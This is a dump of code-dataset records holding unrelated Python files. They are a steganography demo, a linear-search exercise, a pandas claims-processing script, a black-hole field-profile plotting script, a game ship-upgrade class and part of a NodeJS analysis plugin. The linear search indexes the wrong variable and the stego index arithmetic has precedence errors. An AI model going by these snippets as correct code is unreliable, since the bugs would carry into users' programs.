range(len(img[0])):\n if (i+1 * j+1) % pattern == 0:\n try:\n img[i-1][j-1][0] = next(msg)\n except StopIteration:\n img[i-1][j-1][0] = 0\n return img\n\ndef decode(img_loc,password):\n key = check_spell()\n img = get_image(img_loc)\n\n if password != key:\n print (\"Senha inválida\")\n return\n \n pattern = 8\n message = ''\n for i in range(len(img)):\n for j in range(len(img[0])):\n if (i-1 * j-1) % pattern == 0:\n if img[i-1][j-1][0] != 0:\n message = message + chr(img[i-1][j-1][0])\n else:\n return message\n\nimg = encode('lena.png','Hello World','There is a catcher in the rye')\ncv2.imwrite('modified.png', img)\nmessage = decode('modified.png','There is a catcher in the rye')\nprint (message)\n","sub_path":"Stego/stego.py","file_name":"stego.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"288735532","text":"#Title: Linear Search in unsorted array\n#Author:Jithin Zacharia\n#Date: 29 June 2017\n\n#getting values form the user\na=[];\nsize=input('Enter the size of the array')\nfor i in range(0,size):\n\telements=input('Enter the elements into the array')\n\ta.append(elements);\nprint (a);\n#getting the key value form user\nkey=input('Please enter the item to be serarched')\nfor j in range(0,size):\n\tif(key==a[i]):\n\t\tprint('Item found');\n\telse:\n\t\tprint('item not found');\n","sub_path":"Arrays/linear_search_array.py","file_name":"linear_search_array.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"515898602","text":"import pandas as pd\r\nimport numpy as np\r\nimport os\r\nimport re\r\n\r\n# read data\r\npersonsource='C:/Users/baili.lu/Documents/My Received Files/SI'\r\nclaimsource='C:/Users/baili.lu/Documents/My Received Files/SI Files'\r\n \r\npersondict = dict()\r\nfor root, dirs, filenames in os.walk(personsource):\r\n for f in filenames:\r\n date = None \r\n #print(f)\r\n tablename = f.replace('.csv','')\r\n date = tablename[-8:]\r\n date = date[4:]+date[:4]#reaarange date from MDY to YMD\r\n tablename = tablename[:-9]\r\n tempdf = pd.read_csv(personsource+'/'+f, encoding = 'latin-1')\r\n tempdf['File Date'] = date\r\n persondict[date] = tempdf\r\n \r\n# concatenate files\r\nperson = pd.concat(persondict)\r\n\r\nclaimtable=pd.read_csv(claimsource+'/'+'ClaimsSent_01092017-01172017.csv')\r\n\r\nclaimtable['File Date']=claimtable['File Date'].apply(str)\r\n\r\npersontable=pd.merge(person,claimtable,on=['Claim Number','File Date'],how='left')\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nfilter_colname=['Hits - Content','Hits - Rating Relevance','Claim Number', 'DataSet','File Date']\r\nfilter_col= [col for col in list(persontable) if col.startswith(tuple(filter_colname))]\r\n \r\nperson_hits=persontable[filter_col]\r\n\r\nstring='whitepages'\r\n\r\ndef contentextraction(r):\r\n content = list()\r\n for x in range(500):\r\n if (r['Hits - Rating Relevance - ' + str(x+1)] in ['Very High','High']) and (string not in str(r['Hits - Content - ' + str(x+1)]).lower()):\r\n content.append(str(r['Hits - Content - ' + str(x+1)]))\r\n return ' '.join(content)\r\n \r\n\r\n \r\nperson_hits['contentextraction'] = person_hits.apply(contentextraction,axis=1)\r\n \r\n \r\n\r\n\r\n\r\n\r\n## no need\r\n#person_hits['HITS_Merge'] = person_hits.apply(lambda x: ' '.join(x.dropna().astype(str)),axis=1)\r\n#or\r\n#persontable['HITS_Merge'] = persontable[filter_col].apply(lambda x: ' '.join(x.dropna().astype(str)),axis=1)\r\n\r\n\r\n#rule=re.compile('((?:[^A-Za-z\\s]|\\s)+)')\r\npattern=re.compile(\"[^a-zA-Z\\s]\")\r\n\r\n\r\nperson_hits['HITS_regex']=person_hits['contentextraction'].apply(lambda row: pattern.sub('',str(row)))\r\n\r\n\r\nperson_hits['HITS_content']=[' '.join(string.split()) for string in person_hits['HITS_regex']]\r\n\r\nperson_hits['HITS_content'].replace('', np.nan, inplace=True)\r\n\r\nperson_hits=person_hits.dropna(subset=['HITS_content'])\r\n \r\nperson_hits_out=person_hits[['Claim Number', 'File Date', 'HITS_content','DataSet_y']] \r\n \r\nperson_hits_out.to_csv(r'C:\\Users\\baili.lu\\Documents\\My Received Files\\SI\\person_hits.csv', sep=',',index=False)\r\n\r\n\r\n\r\n\r\n \r\n################### \r\n\r\n# summarize HITS relevance\r\n# not for dan\r\n#relevance_col= [col for col in list(person_hits) if col.startswith('Hits - Rating Relevance')]\r\n \r\n#person_relevance=persontable[relevance_col]\r\n\r\n#result=person_relevance.apply(pd.value_counts).sum(axis=1)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n#person_hits_out.loc[(person_hits_out['Claim Number']=='3007791792-1') & (person_hits_out['File Date']=='20170111')].to_csv('try.csv')\r\n\r\n\r\n\r\n#for col in relevance_col:\r\n# for i in person_hits[col]:\r\n# if i == \"Low\":\r\n# index=person_hits.iloc[i].index\r\n# for j in person_hits.columns:\r\n# if j[-3:]==col[-3:]:\r\n# person_hits.set_value(index,j,'')\r\n# index=0 \r\n# \r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"person_hits.py","file_name":"person_hits.py","file_ext":"py","file_size_in_byte":3494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"416600772","text":"import yt\nfrom yt import derived_field\nfrom yt.units import cm\nimport numpy as np\nimport time\nimport matplotlib.pyplot as plt\nimport math\nfrom os import makedirs\nimport sys\nfrom scipy.interpolate import interp1d\nfrom scipy.optimize import curve_fit\nimport ctypes\n\nstart_time = time.time()\n\na_dirs = {}\na_dirs[\"0\"] = \"run0031_KNL_l0_m0_a0_Al0_mu0.4_M1_correct_Ylm\"\na_dirs[\"0.7\"] = \"run0028_KNL_l0_m0_a0.7_Al0_mu0.4_M1_correct_Ylm\"\na_dirs[\"0.99\"] = \"run0029_KNL_l0_m0_a0.99_Al0_mu0.4_M1_correct_Ylm\"\n\nz_position = 0.001\t# z position of slice\nnumber = 1550\ndt = 0.25\nt = number*dt\n\n# choose a values to plot\na_list = [\"0\"]\n\n# set centre\ncenter = [512.0, 512.0, 0]\n\n# set up parameters\nR_outer_horizon = 0.25\t# R_outer = r_+ / 4 ~= 1 / 4 for an extremal Kerr BH\nR_min = 0.25\nR_max = 450\nN_bins = 256\n\n#\ndata_root_path = \"/rds/user/dc-bamb1/rds-dirac-dp131/dc-bamb1/GRChombo_data/KerrSF\"\n\n# define true radial solution function\nM = 1\nmu = 0.4\nomega = 0.4\nKerrlib = ctypes.cdll.LoadLibrary('/home/dc-bamb1/GRChombo/Source/utils/KerrBH_Rfunc_lib.so')\nKerrlib.Rfunc.argtypes = [ctypes.c_double, ctypes.c_double, ctypes.c_double, ctypes.c_double, ctypes.c_int, ctypes.c_int, ctypes.c_bool, ctypes.c_bool, ctypes.c_double]\nKerrlib.Rfunc.restype = ctypes.c_double\n\n#make_smoothed_profile(a_list[0], 20)\n#sys.exit()\n\n### derived fields\n# weighting field = (cell_volume)^(2/3) / (2*pi * r * dr) \n@derived_field(name = \"weighting_field\", units = \"\")\ndef _weighting_field(field, data):\n return pow(data[\"cell_volume\"].in_base(\"cgs\"),2.0/3) * N_bins / (2*math.pi* data[\"cylindrical_radius\"]*(R_max - R_min)*cm)\n\ndef get_data_v1(key, number):\n\tdata_sub_dir = a_dirs[key]\n\tdsi = yt.load(data_root_path + \"/\" + data_sub_dir + \"/KerrSFp_{:06d}.3d.hdf5\".format(number))\n\tprint(\"loaded dataset number \" + str(number) + \" for \" + data_sub_dir) \n\tslice = dsi.r[:,:,z_position]\n\tslice.set_field_parameter(\"center\", center)\n\trp = yt.create_profile(slice, \"cylindrical_radius\", fields=[\"phi\"], n_bins=128, weight_field=\"weighting_field\", extrema={\"cylindrical_radius\" : (R_min, R_max)})\n\tphi = rp[\"phi\"].value\n\tR = rp.x.value\n\tprint(\"made profile\")\n\treturn (R, phi)\n\ndef get_data(key, number):\n\tdata_sub_dir = a_dirs[key]\n\tdsi = yt.load(data_root_path + \"/\" + data_sub_dir + \"/KerrSFp_{:06d}.3d.hdf5\".format(number))\n\tprint(\"loaded dataset number \" + str(number) + \" for \" + data_sub_dir)\n\tslice = dsi.r[:,:,z_position]\n\tslice.set_field_parameter(\"center\", center)\n\tphi = slice[\"phi\"].value.flatten()\n\tR = slice[\"spherical_radius\"].value.flatten()\n\tprint(\"made profile\")\n\treturn (R, phi)\n \nR, phi1 = get_data(a_list[0], number)\nprint(\"got profile for a=\" + a_list[0], flush=True)\nphi_list = [phi1]\nfor i in range(1, len(a_list)):\n\tphi = get_data(a_list[i], number)[1]\n\tphi_list.append(phi)\n\tprint(\"got profile for a=\" + a_list[i], flush=True)\n\n### plot phi profiles vs r_BS\ncolours = ['r', 'b', 'g']\n\n# make plot \nfor i in range(0, len(a_list)):\n\ta = a_list[i]\n\tr_plus = 1 + math.sqrt(1 - float(a)**2)\n\tr_minus = 1 - math.sqrt(1 - float(a)**2)\n\tr = R*(1 + r_plus/(4*R))**2\n\tlnr = np.log(r - r_plus)\n\tphi = phi_list[i]\n\t#r_star = r + ((r_plus**2)*np.log(r - r_plus) - (r_minus**2)*np.log(r - r_minus))/(r_plus - r_minus)\t\n\tplt.plot(lnr, phi, colours[i]+\".\", markersize=4, label=\"a = \" + a_list[i])\n\t# fit true solution to data\n\tdef true_stationary_phi(x, C1, C2):\n\t\t# x = ln(r - r_plus)\n\t\tr_BL = r_plus + np.exp(x)\n\t\tsol1 = np.zeros(r_BL.size)\n\t\tsol2 = np.zeros(r_BL.size)\n\t\tfor i in range(0, r_BL.size):\n \t\tsol1[i] = 100*Kerrlib.Rfunc(M, mu, omega, float(a), 0, 0, True, True, r_BL[i])\n \t\tsol2[i] = 100*Kerrlib.Rfunc(M, mu, omega, float(a), 0, 0, True, False, r_BL[i])\n\t\treturn C1*sol1 + C2*sol2\n\tpopt, pcov = curve_fit(true_stationary_phi, lnr, phi)\n\tlnr_fitted = np.linspace(np.min(lnr), np.max(lnr), 256) \n\tfitted_phi = true_stationary_phi(lnr_fitted, popt[0], popt[1])\n\tplt.plot(lnr_fitted, fitted_phi, \"k-\", label=\"fitted stationary solution, R1={:.2f} I1={:.2f} a ={:s}\".format(popt[0], popt[1], a_list[i]))\nplt.ylabel(\"$\\\\phi$\")\nplt.legend(fontsize=8)\n#plt.ylim((-5, 35))\ntitle = \"field profile, $L=0$, $M=1$, $m=0$, $M\\\\omega=M\\\\mu=1$ $z$={:.3}, time={:.1f}\".format(z_position, t) \nplt.title(title)\nplt.xlabel(\"$\\\\ln(r_{BL} - r_+)$\")\nplt.grid(axis=\"both\")\nplt.tight_layout()\n\nsave_root_path = \"/home/dc-bamb1/GRChombo/Analysis/plots/\" \nsave_name = \"phi_profile_vs_ln_r-r_plus_compare_a_t={:.2f}.png\".format(t)\nsave_path = save_root_path + save_name\nplt.savefig(save_path, transparent=False)\nplt.clf()\nprint(\"saved \" + str(save_path))\n\n","sub_path":"Analysis/scripts/old_scripts/radial_profile_phi_compare_a_v2.py","file_name":"radial_profile_phi_compare_a_v2.py","file_ext":"py","file_size_in_byte":4538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"579549625","text":"# Typing imports\nfrom __future__ import annotations\n\nfrom ..cfg import bbData\nfrom .items import shipItem\nfrom ..baseClasses import serializable\nfrom .. import lib\n\n\nclass ShipUpgrade(serializable.Serializable):\n \"\"\"A ship upgrade that can be applied to shipItems, but cannot be unapplied again.\n There is no technical reason why a ship upgrade could not be removed, but from a game design perspective,\n it adds extra value and strategy to the decision to apply an upgrade.\n\n :var wiki: A web page to present as the upgrade's wikipedia article in its info page\n :vartype wiki: str\n :var hasWiki: Whether or not this upgrade's wiki attribute is populated\n :vartype hasWiki: bool\n :var name: The name of the upgrade. This must be unique.\n :vartype name: str\n :var shipToUpgradeValueMult: upgrades do not have a value, their value is calculated as a percentage of the value of the\n ship to be applied to. shipToUpgradeValueMult is that percentage multiplier.\n :vartype shipToUpgradeValueMult: float\n :var vendor: The manufacturer of this upgrade.\n :vartype vendor: str\n :var hasVendor: Whether or not this upgrade's vendor attribute is populated\n :vartype hasVendor: bool\n :var armour: An additive boost to the owning ship's armour\n :vartype armour: int\n :var armourMultiplier: A multiplier to apply to the ship's armour\n :vartype armourMultiplier: float\n :var cargo: An additive boost to the owning ship's cargo storage\n :vartype cargo: int\n :var cargoMultiplier: A multiplier to apply to the ship's cargo storage\n :vartype cargoMultiplier: float\n :var maxSecondaries: An additive boost to the number of secondary weapons equippable by the owning ship\n :vartype maxSecondaries: int\n :var maxSecondariesMultiplier: A multiplier to apply to the number of secondary weapons equippable by the ship\n :vartype maxSecondariesMultiplier: float\n :var handling: An additive boost to the owning ship's handling\n :vartype handling: int\n :var handlingMultiplier: A multiplier to apply to the ship's handling\n :vartype handlingMultiplier: float\n :var maxPrimaries: An additive boost to the number of primary weapons equippable by the owning ship\n :vartype maxPrimaries: int\n :var maxPrimariesMultiplier: A multiplier to apply to the number of primary weapons equippable by the ship\n :vartype maxPrimariesMultiplier: float\n :var maxTurrets: An additive boost to the maximum number of turrets equippable by the owning ship\n :vartype maxTurrets: int\n :var maxTurretsMultiplier: A multiplier to apply to the maximum number of turrets equippable by the ship\n :vartype maxTurretsMultiplier: float\n :var maxModules: An additive boost to the number of modules that the owning ship can equip\n :vartype maxModules: int\n :var maxModulesMultiplier: A multiplier to apply to the number of modules that the ship can equip\n :vartype maxModulesMultiplier: float\n :var techLevel: A rating from 1 to 10 of this upgrade's technological advancement. Used as a reference to compare\n against other ship upgrades.\n :vartype techLevel: int\n :var hasTechLevel: whether or not this ship upgrade has a tech level\n :vartype hasTechLevel: bool\n :var builtIn: Whether this upgrade is built into BountyBot (loaded in from bbData) or was custom spawned.\n :vartype builtIn: bool\n \"\"\"\n\n def __init__(self, name : str, shipToUpgradeValueMult : float, armour : int = 0.0, armourMultiplier : float = 1.0,\n cargo : int = 0, cargoMultiplier : float = 1.0, maxSecondaries : int = 0,\n maxSecondariesMultiplier : float = 1.0, handling : int = 0, handlingMultiplier : float = 1.0,\n maxPrimaries : int = 0, maxPrimariesMultiplier : float = 1.0, maxTurrets : int = 0,\n maxTurretsMultiplier : float = 1.0, maxModules : int = 0, maxModulesMultiplier : float = 1.0,\n vendor : str = \"\", wiki : str = \"\", techLevel : int = -1, builtIn : bool = False):\n \"\"\"\n :param str name: The name of the upgrade. This must be unique.\n :param float shipToUpgradeValueMult: upgrades do not have a value, their value is calculated as a percentage of the\n value of the ship to be applied to. shipToUpgradeValueMult is that\n percentage multiplier.\n :param str wiki: A web page to present as the upgrade's wikipedia article in its info page\n :param str vendor: The manufacturer of this upgrade.\n :param int armour: An additive boost to the owning ship's armour\n :param float armourMultiplier: A multiplier to apply to the ship's armour\n :param int cargo: An additive boost to the owning ship's cargo storage\n :param float cargoMultiplier: A multiplier to apply to the ship's cargo storage\n :param int maxSecondaries: An additive boost to the number of secondary weapons equippable by the owning ship\n :param float maxSecondariesMultiplier: A multiplier to apply to the number of secondary weapons equippable by the ship\n :param int handling: An additive boost to the owning ship's handling\n :param float handlingMultiplier: A multiplier to apply to the ship's handling\n :param int maxPrimaries: An additive boost to the number of primary weapons equippable by the owning ship\n :param float maxPrimariesMultiplier: A multiplier to apply to the number of primary weapons equippable by the ship\n :param int maxTurrets: An additive boost to the maximum number of turrets equippable by the owning ship\n :param float maxTurretsMultiplier: A multiplier to apply to the maximum number of turrets equippable by the ship\n :param int maxModules: An additive boost to the number of modules that the owning ship can equip\n :param float maxModulesMultiplier: A multiplier to apply to the number of modules that the ship can equip\n :param int techLevel: A rating from 1 to 10 of this upgrade's technological advancement. Used as a reference to\n compare against other ship upgrades.\n :param bool builtIn: Whether this upgrade is built into BountyBot (loaded in from bbData) or was custom spawned.\n \"\"\"\n self.name = name\n self.shipToUpgradeValueMult = shipToUpgradeValueMult\n self.vendor = vendor\n self.hasVendor = vendor != \"\"\n\n self.armour = armour\n self.armourMultiplier = armourMultiplier\n\n self.cargo = cargo\n self.cargoMultiplier = cargoMultiplier\n\n self.maxSecondaries = maxSecondaries\n self.maxSecondariesMultiplier = maxSecondariesMultiplier\n\n self.handling = handling\n self.handlingMultiplier = handlingMultiplier\n\n self.maxPrimaries = maxPrimaries\n self.maxPrimariesMultiplier = maxPrimariesMultiplier\n\n self.maxTurrets = maxTurrets\n self.maxTurretsMultiplier = maxTurretsMultiplier\n\n self.maxModules = maxModules\n self.maxModulesMultiplier = maxModulesMultiplier\n\n self.wiki = wiki\n self.hasWiki = wiki != \"\"\n\n self.techLevel = techLevel\n self.hasTechLevel = techLevel != -1\n\n self.builtIn = builtIn\n\n\n def __eq__(self, other : ShipUpgrade) -> bool:\n \"\"\"Decide whether two ship upgrades are the same, based purely on their name and object type.\n\n :param shipUpgrade other: The upgrade to compare this one against.\n :return: True if other is a shipUpgrade instance, and shares the same name as this upgrade\n :rtype: bool\n \"\"\"\n return type(self) == type(other) and self.name == other.name\n\n\n def valueForShip(self, ship : shipItem.Ship) -> int:\n \"\"\"Calculate the value of this ship upgrade, when it is to be applied to the given ship\n\n :param shipItem ship: The ship that the upgrade is to be applied to\n :return: The number of credits at which this upgrade is valued when being applied to ship\n :rtype: int\n \"\"\"\n return ship.value * self.shipToUpgradeValueMult\n\n\n def toDict(self, **kwargs) -> dict:\n \"\"\"Serialize this shipUpgrade into a dictionary for saving to file\n Contains all information needed to reconstruct this upgrade. If the upgrade is builtIn,\n this includes only the upgrade name.\n\n :return: A dictionary-serialized representation of this upgrade\n :rtype: dict\n \"\"\"\n\n itemDict = {\"name\": self.name, \"builtIn\": self.builtIn}\n\n if not self.builtIn:\n if self.hasVendor:\n itemDict[\"vendor\"] = self.vendor\n\n if self.shipToUpgradeValueMult != 1.0:\n itemDict[\"shipToUpgradeValueMult\"] = self.shipToUpgradeValueMult\n\n if not self.builtIn:\n additiveStats = { \"armour\": self.armour, \"cargo\": self.cargo, \"handling\": self.handling,\n \"maxSecondaries\": self.maxSecondaries, \"maxPrimaries\": self.maxPrimaries,\n \"maxTurrets\": self.maxTurrets, \"maxModules\": self.maxModules}\n multiplierStats = { \"armour\": self.armourMultiplier, \"cargo\": self.cargoMultiplier,\n \"handling\": self.handlingMultiplier,\n \"maxSecondaries\": self.maxSecondariesMultiplier,\n \"maxPrimaries\": self.maxPrimariesMultiplier,\n \"maxTurrets\": self.maxTurretsMultiplier, \"maxModules\": self.maxModulesMultiplier}\n\n for statName in additiveStats:\n if additiveStats[statName] != 0:\n itemDict[statName] = additiveStats[statName]\n for statName in multiplierStats:\n if multiplierStats[statName] != 1:\n itemDict[statName] = multiplierStats[statName]\n\n return itemDict\n\n\n def statsStringShort(self) -> str:\n \"\"\"Get a summary of the effects this upgrade will have on the owning ship, in string format.\n\n :return: A string summary of the upgrade's effects\n :rtype: str\n \"\"\"\n additiveStats = { \"Max secondaries\": self.maxSecondaries, \"Max primaries\": self.maxPrimaries,\n \"Max turrets\": self.maxTurrets, \"Max modules\": self.maxModules, \"Cargo\": self.cargo,\n \"Armour\": self.armour, \"Handling\": self.handling}\n\n multiplierStats = { \"Max secondaries\": self.maxSecondariesMultiplier, \"Max primaries\": self.maxPrimariesMultiplier,\n \"Max turrets\": self.maxTurretsMultiplier, \"Max modules\": self.maxModulesMultiplier,\n \"Cargo\": self.cargoMultiplier, \"Armour\": self.armourMultiplier,\n \"Handling\": self.handlingMultiplier}\n\n statsStr = \"*\"\n additiveStrs = (statName + \": \" + lib.stringTyping.formatAdditive(additiveStats[statName])\n for statName in additiveStats if additiveStats[statName] != 0)\n multiplierStrs = (statName + \": \" + lib.stringTyping.formatMultiplier(multiplierStats[statName])\n for statName in additiveStats if multiplierStats[statName] != 1)\n statsStr = \", \".join(tuple(additiveStrs) + tuple(multiplierStrs))\n\n return statsStr if len(statsStr) > 1 else \"*No effect*\"\n\n\n @classmethod\n def fromDict(cls, upgradeDict : dict, **kwargs) -> ShipUpgrade:\n \"\"\"Factory function reconstructing a shipUpgrade object from its dictionary-serialized representation.\n The opposite of shipUpgrade.toDict\n If the upgrade is builtIn, return a reference to the pre-constructed upgrade object.\n\n :param dict upgradeDict: A dictionary containing all information needed to produce the required shipUpgrade\n :return: A shipUpgrade object as described by upgradeDict\n :rtype: shipUpgrade\n \"\"\"\n if upgradeDict[\"builtIn\"]:\n return bbData.builtInUpgradeObjs[upgradeDict[\"name\"]]\n else:\n return ShipUpgrade(upgradeDict[\"name\"], upgradeDict[\"shipToUpgradeValueMult\"],\n armour=upgradeDict[\"armour\"] if \"armour\" in upgradeDict else 0.0,\n armourMultiplier=upgradeDict[\"armourMultiplier\"] \\\n if \"armourMultiplier\" in upgradeDict else 1.0,\n cargo=upgradeDict[\"cargo\"] if \"cargo\" in upgradeDict else 0,\n cargoMultiplier=upgradeDict[\"cargoMultiplier\"] \\\n if \"cargoMultiplier\" in upgradeDict else 1.0,\n maxSecondaries=upgradeDict[\"maxSecondaries\"] if \"maxSecondaries\" in upgradeDict else 0,\n maxSecondariesMultiplier=upgradeDict[\"maxSecondariesMultiplier\"] \\\n if \"maxSecondariesMultiplier\" in upgradeDict else 1.0,\n handling=upgradeDict[\"handling\"] if \"handling\" in upgradeDict else 0,\n handlingMultiplier=upgradeDict[\"handlingMultiplier\"] \\\n if \"handlingMultiplier\" in upgradeDict else 1.0,\n maxPrimaries=upgradeDict[\"maxPrimaries\"] if \"maxPrimaries\" in upgradeDict else 0,\n maxPrimariesMultiplier=upgradeDict[\"maxPrimariesMultiplier\"] \\\n if \"maxPrimariesMultiplier\" in upgradeDict else 1.0,\n maxTurrets=upgradeDict[\"maxTurrets\"] if \"maxTurrets\" in upgradeDict else 0,\n maxTurretsMultiplier=upgradeDict[\"maxTurretsMultiplier\"] \\\n if \"maxTurretsMultiplier\" in upgradeDict else 1.0,\n maxModules=upgradeDict[\"maxModules\"] if \"maxModules\" in upgradeDict else 0,\n maxModulesMultiplier=upgradeDict[\"maxModulesMultiplier\"] \\\n if \"maxModulesMultiplier\" in upgradeDict else 1.0,\n vendor=upgradeDict[\"vendor\"] if \"vendor\" in upgradeDict else \"\",\n builtIn=False)\n","sub_path":"bot/gameObjects/shipUpgrade.py","file_name":"shipUpgrade.py","file_ext":"py","file_size_in_byte":14629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"392231025","text":"import cast.analysers.ua\nfrom cast.analysers import Bookmark, create_link, log\nfrom cast.application import open_source_file # @UnresolvedImport\nfrom nodejs_parser import analyse, create_link_nodeJS\nfrom server_analysis import LoopBackAnalysis, SailsAnalysis, SailsJSApplications\nfrom collections import OrderedDict\nfrom symbols import Violations, PotentialController, ExternalLibrary, nodejs_open_source_file\nfrom microservice_analysis import Seneca\nimport traceback\nimport os\nimport json\nfrom cast import Event\nfrom collections import defaultdict\n\nfrom data_support_analysis import Knexsupport\nfrom AMPQ_analysis import MQTT\n\ndef get_short_uri(uri):\n shortUri = uri\n if '?' in uri:\n shortUri = uri[:uri.find('?')]\n if shortUri.endswith('/'):\n shortUri = shortUri[:-1]\n return shortUri\n \nclass NodeJS(cast.analysers.ua.Extension):\n\n class ParsingResults:\n\n def __init__(self):\n self.requires = []\n self.services = []\n self.httpRequests = []\n self.mongooseConnections = []\n self.mongooseModels = []\n self.dbConnections = []\n self.marklogicDatabases = []\n self.couchdbDatabases = []\n self.couchdbCalls = []\n self.violations = Violations()\n self.isApplication = False\n self.potentialExpressControllerClasses = []\n self.potentialExpressControllerRoutesFCall = []\n self.externalLibraries = {}\n self.externalLibrariesFunctionCalls = {}\n self.externalLibrariesMethodCalls = {}\n\n # loopback flag infos\n self.LoopbackServer = False\n self.loopbackRemoteMethods = []\n self.linkSuspensions = []\n\n # Sails info\n self.database_sails = None\n self.models_sails = []\n self.model_infos = []\n self.service_sails = []\n self.action_sails = []\n self.table_name = {}\n self.adapter_sql = {}\n self.function_sql = defaultdict(list)\n\n # Knex\n self.knex_require = False\n self.bookshelf_require = False\n self.model_knex_infos = []\n self.knex_config = None\n\n # mqtt\n self.mqtt_require = False\n self.mqtt_methods = []\n self.mqtt_events = []\n \n # package.json dependencies have info of nodejs project.\n self.is_node_project = False\n\n # seneca-micro-service\n self.seneca_require = False\n self.seneca_uses = []\n self.add_call = []\n self.act_call = []\n\n \"\"\"\n Parse .js files and create NodeJS services.\n \"\"\"\n def __init__(self):\n \n self.bFirstJabascriptFileAnalysis = True\n self.currentFile = None\n self.currentSourceCode = None\n self.currentFilename = None\n self.mongooseConnectionsByName = {}\n self.mongooseConnectionsByAst = {}\n self.mongooseModelsByConnectionByName = {}\n# self.marklogicDatabasesByConnectionVariable = {}\n self.nbOperations = 0\n self.nbMongooseModels = 0\n self.nbMarklogicDatabases = 0\n self.nbMarklogicCollections = 0\n self.nbCouchDBDatabases = 0\n self.nbDbAccesses = 0\n self.nbApplications = 0\n self.unknownTablesByName = {}\n self.httpRequestGuids = {}\n self.servicesByFilename = {}\n self.nodejsVersionsByDirname = {}\n\n jsonPath = os.path.abspath(os.path.join(os.path.dirname(__file__), 'config.json'))\n self.config = json.loads(nodejs_open_source_file(jsonPath))\n\n self.marklogicDatabasesByConnectionParameter = {}\n\n self.parsingResultsToKeepByJSContent = OrderedDict()\n\n self.potentialExpressControllers = OrderedDict()\n self.potentialExpressControllerRoutesFCall = []\n\n self.externalLibrariesParent = None\n self.externalLibraries = {}\n\n self.jsonFilesByPathname = {}\n self.loopback_analysis = LoopBackAnalysis()\n self.potentialLoopbackServerFiles = []\n self.nbLoopbackModels = 0\n\n # Sails\n self.sails_apps = SailsJSApplications()\n\n # Knex support\n self.knex_support = Knexsupport()\n \n # mqtt\n self.mqtt = MQTT()\n\n # seneca\n self.seneca = Seneca()\n\n self.node_project_path = ''\n\n @Event('com.castsoftware.html5', 'start_json_content')\n def start_json_content(self, file):\n\n filename = file.get_path()\n if filename.lower().endswith('middleware.json'):\n self.loopback_analysis.search_for_loopback_application(filename)\n\n if not filename.lower().endswith('package.json'):\n self.jsonFilesByPathname[filename] = file\n return\n \n try:\n\n '''\n * package.json resolution\n '''\n jsonContent = json.loads(nodejs_open_source_file(filename))\n if 'engines' in jsonContent:\n if 'node' in jsonContent['engines']:\n file.save_property('sourceFile.html5', 1)\n nodeVersion = jsonContent['engines']['node']\n parentDir = os.path.dirname(filename)\n bm = Bookmark(file, 1, 1, 1, 1)\n try:\n enginesFound = False\n nodeFound = False\n infile = open_source_file(filename)\n nLine = 1\n for line in infile:\n if '\"engines\"' in line:\n enginesFound = True\n if '\"node\"' in line:\n nodeFound = True\n elif enginesFound:\n if '\"node\"' in line:\n nodeFound = True\n if nodeFound:\n index = line.find(\"node\")\n indexBegin = line.find('\"', index + 6)\n if indexBegin:\n indexEnd = line.find('\"', indexBegin + 1)\n else:\n indexEnd = -1\n if indexEnd > 0:\n bm = Bookmark(file, nLine, indexBegin + 2, nLine, indexEnd + 1)\n break\n nLine += 1\n infile.close()\n except:\n log.debug(traceback.format_exc())\n self.nodejsVersionsByDirname[parentDir] = { 'version': nodeVersion.strip(), 'position' : bm }\n log.info('NodeJS version (' + str(nodeVersion) + ') found in ' + file.get_path())\n \n def is_node_dependencies(json_content):\n is_node_dependencies = ['express', 'hapi', 'sail', 'loopback', 'koa', 'seneca']\n\n for elm in is_node_dependencies:\n if elm in json_content['dependencies']:\n return True\n\n return False\n\n if 'name' in jsonContent and 'main' in jsonContent and 'dependencies' in jsonContent and is_node_dependencies(jsonContent):\n self.node_project_path = filename.replace('package.json', '')\n\n '''\n * .sailrc file detection.\n '''\n\n sail_config = filename.replace('package.json', '.sailsrc')\n routes_config = filename.replace('package.json', 'config\\\\routes.js')\n api_controler = filename.replace('package.json', 'api\\\\controllers')\n api_models = filename.replace('package.json', 'api\\\\models')\n is_sails = os.path.exists(sail_config) and os.path.exists(routes_config) and os.path.exists(api_controler)\n\n if is_sails:\n fullname = os.path.abspath(sail_config.replace('\\\\.sailsrc', ''))\n name = fullname.split('\\\\')[-1]\n sails_app = SailsAnalysis(fullname, name)\n\n if api_models:\n list_models = os.listdir(api_models)\n sails_app.set_list_models(list_models)\n\n self.sails_apps.append(sails_app)\n\n except:\n log.debug(traceback.format_exc())\n\n @Event('com.castsoftware.html5', 'start_analysis_root')\n def start_analysis_root(self, rootDir):\n log.info('start root analysis ' + rootDir)\n self.currentFile = None\n self.currentSourceCode = None\n self.currentFilename = None\n\n @Event('com.castsoftware.html5', 'end_analysis_root')\n def end_analysis_root(self, rootDir):\n log.info('end root analysis ' + rootDir)\n \n def process_before_javascript_analyses(self):\n for pathname, jsonFile in self.jsonFilesByPathname.items():\n dirname = os.path.dirname(pathname)\n self.loopback_analysis.process(dirname, jsonFile)\n\n @Event('com.castsoftware.html5', 'start_javascript_content')\n def start_javascript_content(self, jsContent):\n\n self.loopback_analysis.jsContent = jsContent\n \n if self.bFirstJabascriptFileAnalysis:\n self.process_before_javascript_analyses()\n self.bFirstJabascriptFileAnalysis = False\n \n self.currentFile = jsContent.get_file()\n self.currentFilename = os.path.abspath(self.currentFile.get_path())\n self.currentSourceCode = jsContent.kbObject\n \n versions = None\n for dirName, version in self.nodejsVersionsByDirname.items():\n if self.currentFilename.startswith(dirName):\n if versions == None:\n versions = []\n versions.append(version)\n \n parsingResults = self.ParsingResults()\n\n sails_app = self.sails_apps.get_server_from_path(self.currentFilename)\n if sails_app:\n parsingResults.models_sails = sails_app.list_models\n parsingResults.database_sails = sails_app.database_sails\n parsingResults.table_name = sails_app.table_name\n parsingResults.adapter_sql = sails_app.adapter_sql\n parsingResults.function_sql = 